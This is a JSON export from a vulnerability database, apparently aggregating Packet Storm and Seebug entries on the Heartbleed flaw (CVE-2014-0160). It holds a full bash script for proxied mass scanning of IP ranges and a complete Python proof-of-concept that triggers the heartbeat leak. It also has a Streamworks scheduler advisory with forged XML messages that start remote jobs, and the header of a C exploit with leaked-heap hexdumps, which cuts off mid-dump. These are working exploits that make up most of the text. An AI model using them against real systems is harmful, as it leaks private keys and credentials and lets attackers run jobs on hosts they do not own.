TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62244", "id": "SSV:62244", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:31", "description": "", "cvss3": {}, "published": "2014-04-23T00:00:00", "type": "packetstorm", "title": "Mass Bleed 20140423", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-23T00:00:00", "id": "PACKETSTORM:126288", "href": "https://packetstormsecurity.com/files/126288/Mass-Bleed-20140423.html", "sourceData": "`#!/bin/bash \n# massbleed.sh 20140423 by 1N3 \n# http://treadstonesecurity.blogspot.ca \n# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy] \n# \n# This script has four main functions with the ability to proxy all connections: \n# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16) \n# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443) \n# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single) \n# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet) \n# \n# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work. \n# USAGE EXAMPLES: \n# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy) \n# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy) \n# (example: sh massbleed.sh 127.0.0.1 single 0 proxy) \n# (example: sh massbleed.sh 192.168.0. subnet 0 proxy) \n# \n# Prerequisites: \n# Is the heartbleed POC present? \n# Is unicornscan installed? \n# Is nmap installed? \n \necho \"(--==== http://treadstonesecurity.blogspot.ca\" \necho \"(--==== massbleed.sh 20140423 by 1N3\" \necho \"\" \n \nHEARTBLEED=`ls heartbleed.py` \nUNICORNSCAN=`which unicornscan` \nNMAP=`which nmap` \nRANGE=$1 \nALL_PORTS=$2 \nCUSTOM_PORT=$3 \nPROXY=$4 \nPORT_RANGE=\"1-65000\" \n \nif [ \"$HEARTBLEED\" != \"heartbleed.py\" ]; then \necho \"(--==== heartbleed.py not found!\" \necho \"(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py\" \nexit \nfi \n \nif [ \"$UNICORNSCAN\" == \"\" ]; then \necho \"(--==== unicornscan not installed! Exiting...\" \nexit \nfi \n \nif [ \"$NMAP\" == \"\" ]; then \necho \"(--==== nmap not installed! Exiting...\" \nexit \nfi \n \nif [ -z \"$1\" ]; then \necho \"(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]\" \nexit \nfi \n \nif [ \"$PROXY\" = \"proxy\" ]; then \necho \"(--==== scanning via proxy...\" \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nif [ \"$CUSTOM_PORT\" != \"0\" ]; then \necho \"(--==== Checking $RANGE:$CUSTOM_PORT\" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null \nelse \nfor a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `proxychains unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \nproxychains python heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && proxychains python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nelse \nif [ \"$ALL_PORTS\" = \"single\" ]; then \nfor a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`; \ndo echo \"(--==== Checking $RANGE:\"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"subnet\" ]; then \nfor a in {1..254}; \ndo \necho \"Scanning: $RANGE$a\" \nfor b in `unicornscan \"$RANGE$a\" -mT -r500 | awk '{print $4}' | cut -d']' -f1`; \ndo \necho \"$RANGE$a:$b\" \npython heartbleed.py $RANGE$a -p $b | grep Server; \ndone; \ndone; \nfi \nif [ \"$ALL_PORTS\" = \"port\" ]; then \nfor a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server; \ndone; \nelse \nfor a in `unicornscan $RANGE -p 443 | awk '{print $6}'`; \ndo echo \"(--==== Checking:\" $a && python heartbleed.py $a -p 443 | grep Server; \ndone \nfi \nfi \n \necho \"(--==== scan complete!\" \nexit \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126288/massbleed.sh.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:11:38", "description": "", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "packetstorm", "title": "TLS Heartbeat Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "PACKETSTORM:126072", "href": "https://packetstormsecurity.com/files/126072/TLS-Heartbeat-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) \n# The author disclaims copyright to this source code. \n# Modified by Csaba Fitzl for multiple SSL / TLS version support \n \nimport sys \nimport struct \nimport socket \nimport time \nimport select \nimport re \nfrom optparse import OptionParser \n \noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') \noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') \n \ndef h2bin(x): \nreturn x.replace(' ', '').replace('\\n', '').decode('hex') \n \nversion = [] \nversion.append(['SSL 3.0','03 00']) \nversion.append(['TLS 1.0','03 01']) \nversion.append(['TLS 1.1','03 02']) \nversion.append(['TLS 1.2','03 03']) \n \ndef create_hello(version): \nhello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53 \n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf \nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 \n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 \n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c \nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 \nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 \nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c \nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 \n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 \n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 \n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 \n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 \n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 \n00 0f 00 01 01 \n''') \nreturn hello \n \ndef create_hb(version): \nhb = h2bin('18 ' + version + ' 00 03 01 40 00') \nreturn hb \n \ndef hexdump(s): \nfor b in xrange(0, len(s), 16): \nlin = [c for c in s[b : b + 16]] \nhxdat = ' '.join('%02X' % ord(c) for c in lin) \npdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) \nprint ' %04x: %-48s %s' % (b, hxdat, pdat) \nprint \n \ndef recvall(s, length, timeout=5): \nendtime = time.time() + timeout \nrdata = '' \nremain = length \nwhile remain > 0: \nrtime = endtime - time.time() \nif rtime < 0: \nreturn None \nr, w, e = select.select([s], [], [], 5) \nif s in r: \ndata = s.recv(remain) \n# EOF? \nif not data: \nreturn None \nrdata += data \nremain -= len(data) \nreturn rdata \n \n \ndef recvmsg(s): \nhdr = recvall(s, 5) \nif hdr is None: \nprint 'Unexpected EOF receiving record header - server closed connection' \nreturn None, None, None \ntyp, ver, ln = struct.unpack('>BHH', hdr) \npay = recvall(s, ln, 10) \nif pay is None: \nprint 'Unexpected EOF receiving record payload - server closed connection' \nreturn None, None, None \nprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) \nreturn typ, ver, pay \n \ndef hit_hb(s,hb): \ns.send(hb) \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ is None: \nprint 'No heartbeat response received, server likely not vulnerable' \nreturn False \n \nif typ == 24: \nprint 'Received heartbeat response:' \nhexdump(pay) \nif len(pay) > 3: \nprint 'WARNING: server returned more data than it should - server is vulnerable!' \nelse: \nprint 'Server processed malformed heartbeat, but did not return any extra data.' \nreturn True \n \nif typ == 21: \nprint 'Received alert:' \nhexdump(pay) \nprint 'Server returned error, likely not vulnerable' \nreturn False \n \ndef main(): \nopts, args = options.parse_args() \nif len(args) < 1: \noptions.print_help() \nreturn \nfor i in range(len(version)): \nprint 'Trying ' + version[i][0] + '...' \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nprint 'Connecting...' \nsys.stdout.flush() \ns.connect((args[0], opts.port)) \nprint 'Sending Client Hello...' \nsys.stdout.flush() \ns.send(create_hello(version[i][1])) \nprint 'Waiting for Server Hello...' \nsys.stdout.flush() \nwhile True: \ntyp, ver, pay = recvmsg(s) \nif typ == None: \nprint 'Server closed connection without sending Server Hello.' \nreturn \n# Look for server hello done message. \nif typ == 22 and ord(pay[0]) == 0x0E: \nbreak \n \nprint 'Sending heartbeat request...' \nsys.stdout.flush() \ns.send(create_hb(version[i][1])) \nif hit_hb(s,create_hb(version[i][1])): \n#Stop if vulnerable \nbreak \n \nif __name__ == '__main__': \nmain() \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126072/heartbeat2.py.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-16T18:50:49", "description": "", "cvss3": {}, "published": "2019-01-16T00:00:00", "type": "packetstorm", "title": "Streamworks Job Scheduler Release 7 Authentication Weakness", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2019-01-16T00:00:00", "id": "PACKETSTORM:151177", "href": "https://packetstormsecurity.com/files/151177/Streamworks-Job-Scheduler-Release-7-Authentication-Weakness.html", "sourceData": "` \nAffected Products \nStreamworks Job Scheduler Release 7 (older/newer releases have not \nbeen tested) \n \nReferences \nSecuvera-SA-2016-01 \nhttps://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for \nupdates) \nNo CVE number could be assigned (vendor not listed under \ncve.mitre.org/data/board/archives/2016-01/msg00015.html) \n \nSummary: \nArvato Systems Streamworks Job Scheduler is a software product for \nautomation purposes. It helps \n\"to plan, maintain, control and monitor all of your automatable IT \nprocesses\" (source: vendor product \nhomepage). It consists of different types of services: an \napplication server daemon, a processing \nserver daemon that controls one or multiple agent daemins \ninstalled on operating servers were workload \nhas to be done. \n \nDuring a penetration test at a customers site three weaknesses \nconcerning communication \nauthentication were discovered: \n \n1) All agents installed on server systems use the same X.509 \ncertificates and private key that \nwere issued by the vendor for authentication. \n \n2) The processing server component does not check received \nmessages properly for authenticity. \n \n3) Agents installed on servers do not check received messages \nproperly for authenticity \n \n4) Agents and processing servers are vulnerable against TLS \nHeartbleed attack (CVE-2014-0160 - \nsee https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160) \n \nEffect: \n1) If systems were compromised and authentication material is \nstolen, all certificates have to be \nrevoked and replaced. In addition, this expands the effect of \n3) to the entire environment, \nnot just single systems. \n \n2) An attacker with knwolegde of the message syntax of the product \nand the authentication material \nis able to add, change or delete data within the Streamworks database. \n \n3) An attacker with knowledge of the message syntax of the product \nand the authentication material \nis able to create new or execute available jobs on servers with \nagents installed located within \nthe same network. This can lead to a complete loss of integrity, \nconfidentiality or availability \nof the respective system or data stored/processed on it. \n \n4) An unauthenticated remote attacker is able to read content \nwithin system memory. \n \nVulnerable components and scripts: \nStreamworks Job Scheduler Processing Server Release 7.1 \nStreamworks Job Scheduler Agent Release 7.1 \nolder releases have not been tested \n \nExamples: \nIn the following, a sample to exploit 2) and 3) will be given. \nReplace Information within squared \nbrackets: \n \n2) By sending a the following XML-Message to a Processing server \nit is possible to change system \ninformation of a legitimate configured client as proof-of-concept. \nThe System OS Info was slightly \nchanged: \n \n<AgentNotifyStarted ProcessId=\"7044\" AgentVersion=\"3.1.36\"> \n<ComHeader Version=\"1.0\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime> \n<SourceEndpoint Address=\"0.0.0.0\" Port=\"30000\" SysId=\"[Hostname of \nlegitimate Client]\" /> \n<DestinationEndpoint Address=\"[FQDN of Processing server]\" \nPort=\"9600\" SysId=\"[FQDN of Proces \nsing server]\" /> \n<Sequence>0</Sequence> \n</ComHeader> \n<SystemInformation> \n<OsType>Windows</OsType> \n<OsInfo>Pentest Windows!</OsInfo> \n<OsLocale>de_DE.windows-1252</OsLocale> \n</SystemInformation> \n<KnownJobsList> \n</KnownJobsList> \n<FileTransferOptions Mode=\"ALL\" BlockSize=\"0\" /> \n<Cli CliOptions=\"Enabled\" /> \n</AgentNotifyStarted> \n \n \n------------- \n \n \n3) By sending a XML-Message of the following type to create and \nexecute a new job on a system \n<ServerRequestStartJob> \n<ComHeader Version=\"0.1\"> \n<MandatorCode>0100</MandatorCode> \n<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime> \n<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime> \n<SourceEndpoint Address=\"[FQDN of processing server]\" \nPort=\"9600\" SysId=\"[FQDN of processing \nserver]\" /> \n<DestinationEndpoint Address=\"[IP of Server with agent \ninstalled]\" Port=\"30000\" SysId=\"[Hostname of \nserver with agent installed]\" /> \n<Sequence>1</Sequence> \n<MandatorId>0100</MandatorId> \n</ComHeader> \n<JobStartInfo> \n<JobInfo ServerJobId=\"118291965_1\" ExecutionNo=\"1\" \nPlanDate=\"[YYYY]-[MM]-[DD]\" \nStreamName=\"[NewStreamName]\" JobName=\"[NewJobName]\" Run=\"1\" /> \n<UserName>[Username under which the agent should run the \nScript, e.g. LOCAL\\System]</UserName> \n<Password>[Add Password of the user if needed]</Password> \n<UseUserProfile>true</UseUserProfile> \n<MainScript>[base64-encoded Script code, e.g. \n\"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl\" \nto start a notepad.exe on a Windows Host]</MainScript> \n<KeepJoblogDays>10</KeepJoblogDays> \n</JobStartInfo> \n</ServerRequestStartJob> \n \nSolution: \nInstall Streamworks Release 9.3 \n \n(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available \nin \ngerman only) \n \nDisclosure Timeline: \n2016/05/12 vulnerabilities discovered \n2016/05/30 vendor initially contacted \n2016/06/13 sales representative replied \n2016/06/14 technically responsible contact details received \n2016/07/01 technical personnel contacted, appointment to discuss \nfindings made \n2016/07/11 submitted technical details to responsible personnel \n2016/07/12 responsible product manager replied. Committed to \nextend disclosure timeline due to \ncomprehensible reasons. New disclosure timeline: end of \nSeptember 2016 \n2016/09/08 product manager replied, suggest meeting to discuss fixes \n2016/09/27 meeting took place, half of the vulnerabilities were \nfixed. Timeline until disclosure extended \nagain due to difficult changes. Disclosure timeline \nextended to end of April 2017 \n2017/04/20 Contacted vendor again to remind of the near end of the \ndisclosure timeline. \n2017/04/27 Reply and ongoing discussion about when the fix will be shipped. \n2017/05/20 Vendor replied that due to customers experience fewer \nreleases were made. The fix will be shipped \non the second quarter of 2018. Extended disclosure \ntimeline until the end of June 2018. \n2018/04/03 Contacted vendor as reminder and to get a release ship date. \n2018/04/09 Vendor replied saying that within release 9.3 (shipped \non 2nd quarter 2018) the issues will be fixed \nFinal disclosure timeline: 2019/01/14 after a \nsufficient grace period to customers to install the fixed \nrelease \n2019/01/14 public advisory disclosure \n \n \nCredits \nSimon Bieber, secuvera GmbH \nsbieber@secuvera.de \nhttps://www.secuvera.de \n \nDisclaimer: \nAll information is provided without warranty. The intent is to \nprovide informa- \ntion to secure infrastructure and/or systems, not to be able to \nattack or damage. \ntherefore secuvera shall not be liable for any direct or indirect \ndamages that \nmight be caused by using this information. \n \n \n \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151177/secuvera-SA-2016-01.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:13:48", "description": "", "cvss3": {}, "published": "2014-04-24T00:00:00", "type": "packetstorm", "title": "Heartbleed OpenSSL Information Leak Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "PACKETSTORM:126308", "href": "https://packetstormsecurity.com/files/126308/Heartbleed-OpenSSL-Information-Leak-Proof-Of-Concept.html", "sourceData": "`/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit \n* ========================================================= \n* This exploit uses OpenSSL to create an encrypted connection \n* and trigger the heartbleed leak. The leaked information is \n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS. \n* This exploit leaks upto 65532 bytes of remote heap each request \n* and can be run in a loop until the connected peer ends connection. \n* The data leaked contains 16 bytes of random padding at the end. \n* The exploit can be used against a connecting client or server, \n* it can also send pre_cmd's to plain-text services to establish \n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients \n* will often forcefully close the connection during large leak \n* requests so try to lower your payload request size. \n* \n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n* \n* E.g. \n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed \n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ connecting to 192.168.11.23 443/tcp \n* [ connected to 192.168.11.23 443/tcp \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=65535 \n* [ final record type=24, length=16384 \n* [ wrote 16381 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=42 \n* [ decrypting SSL packet \n* [ final record type=24, length=18 \n* [ wrote 18 bytes of heap to file 'out' \n* [ done. \n* $ ls -al out \n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out \n* $ hexdump -C out \n* - snip - snip \n* \n* Use following example command to generate certificates for clients. \n* \n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\ \n* -keyout server.key -out server.crt \n* \n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\ \n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n* \n* todo: add udp/dtls support. \n* \n* - Hacker Fantastic \n* http://www.mdsec.co.uk \n* \n*/ \n \n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support \n* \n* use -u switch, tested against s_server/s_client version 1.0.1d \n* \n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1 \n* ... \n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........| \n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5| \n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.| \n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....| \n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................| \n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........| \n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............| \n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0| \n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U| \n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168| \n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......| \n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| \n* \n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I| \n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....| \n* 0000054b \n* \n* \n* # openssl s_client -connect localhost:990 -dtls1 \n* ... \n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta \n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit \n* [ ============================================================= \n* [ SSL connection using AES256-SHA \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=1392 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=1336 \n* [ final record type=24, length=1355 \n* [ wrote 1352 bytes of heap to file 'eshta' \n* \n* \n* # hexdump -C eshta \n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............| \n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n| \n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8| \n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...| \n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.| \n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5| \n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....| \n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M| \n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....| \n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...| \n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................| \n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_| \n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............| \n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..| \n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...| \n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State| \n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter| \n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty | \n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..| \n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....| \n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..| \n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.| \n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y| \n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....| \n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.| \n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q| \n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,| \n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:| \n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..| \n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?| \n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..| \n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...| \n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+| \n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...| \n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.| \n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...| \n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..| \n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.| \n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...| \n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w| \n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..| \n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*| \n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............| \n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....| \n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..| \n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w| \n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX| \n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D| \n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j| \n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).| \n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 